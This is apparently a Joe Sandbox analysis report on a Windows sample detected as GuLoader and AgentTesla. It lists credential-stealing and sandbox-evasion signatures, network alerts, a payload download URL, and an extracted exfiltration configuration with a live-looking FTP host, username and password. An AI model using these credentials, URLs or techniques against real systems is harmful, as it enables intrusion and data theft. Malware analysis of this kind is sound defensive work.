Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
u9aPQQIwhj.exe

Overview

General Information

Sample name:u9aPQQIwhj.exe
renamed because original name is a hash value
Original sample name:7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7.exe
Analysis ID:1546022
MD5:8b6b09811835191f99d4e2e9d94d232c
SHA1:08edbf7da5b2e827978e178e5e49b45b5169d87c
SHA256:7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7
Tags:exeSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • u9aPQQIwhj.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\u9aPQQIwhj.exe" MD5: 8B6B09811835191F99D4E2E9D94D232C)
    • u9aPQQIwhj.exe (PID: 7880 cmdline: "C:\Users\user\Desktop\u9aPQQIwhj.exe" MD5: 8B6B09811835191F99D4E2E9D94D232C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: u9aPQQIwhj.exe PID: 7404JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T11:44:20.063181+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449730TCP
            2024-10-31T11:45:03.410315+010020229301A Network Trojan was detected172.202.163.200443192.168.2.462004TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T11:45:28.117345+010028032702Potentially Bad Traffic192.168.2.46211584.38.133.4280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: u9aPQQIwhj.exe.7880.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: u9aPQQIwhj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:62131 version: TLS 1.2
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0040276E FindFirstFileW,4_2_0040276E
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405770
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0040622B FindFirstFileW,FindClose,4_2_0040622B
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62115 -> 84.38.133.42:80
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:62004
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.42
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp, u9aPQQIwhj.exe, 00000004.00000002.2919240219.0000000005A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.bin
            Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.binY
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: u9aPQQIwhj.exe, 00000004.00000002.2937245380.0000000038B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: u9aPQQIwhj.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: u9aPQQIwhj.exe, 00000000.00000002.2410008030.0000000002763000.00000004.00000020.00020000.00000000.sdmp, nsw3DE5.tmp.0.dr, 660.jpg.0.drString found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62131
            Source: unknownNetwork traffic detected: HTTP traffic on port 62131 -> 443
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:62131 version: TLS 1.2
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_00403358
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,4_2_00403358
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00404B0E0_2_00404B0E
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_0040653D0_2_0040653D
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_00404B0E4_2_00404B0E
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0040653D4_2_0040653D
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0015B21D4_2_0015B21D
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_0015E3604_2_0015E360
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_00154A584_2_00154A58
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_00153E404_2_00153E40
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_001541884_2_00154188
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_3889BB904_2_3889BB90
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_3889A7DC4_2_3889A7DC
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390431584_2_39043158
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_3904C2404_2_3904C240
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_3904B2F04_2_3904B2F0
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_39047E404_2_39047E40
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390456A04_2_390456A0
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390466C04_2_390466C0
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390400404_2_39040040
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390423704_2_39042370
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_39045DB74_2_39045DB7
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_3904E4684_2_3904E468
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390477604_2_39047760
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_39412C514_2_39412C51
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 4_2_390400124_2_39040012
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: String function: 00402B38 appears 47 times
            Source: u9aPQQIwhj.exe, 00000000.00000000.1653034165.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
            Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs u9aPQQIwhj.exe
            Source: u9aPQQIwhj.exe, 00000004.00000000.2407952768.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
            Source: u9aPQQIwhj.exe, 00000004.00000002.2936077063.0000000035D09000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs u9aPQQIwhj.exe
            Source: u9aPQQIwhj.exeBinary or memory string: OriginalFilenamekinglet.exe> vs u9aPQQIwhj.exe
            Source: u9aPQQIwhj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@2/3
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040206A
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile created: C:\Users\user\UploadableJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeMutant created: NULL
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile created: C:\Users\user\AppData\Local\Temp\nsg3DD4.tmpJump to behavior
            Source: u9aPQQIwhj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile read: C:\Users\user\Desktop\u9aPQQIwhj.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: Process Memory Space: u9aPQQIwhj.exe PID: 7404, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
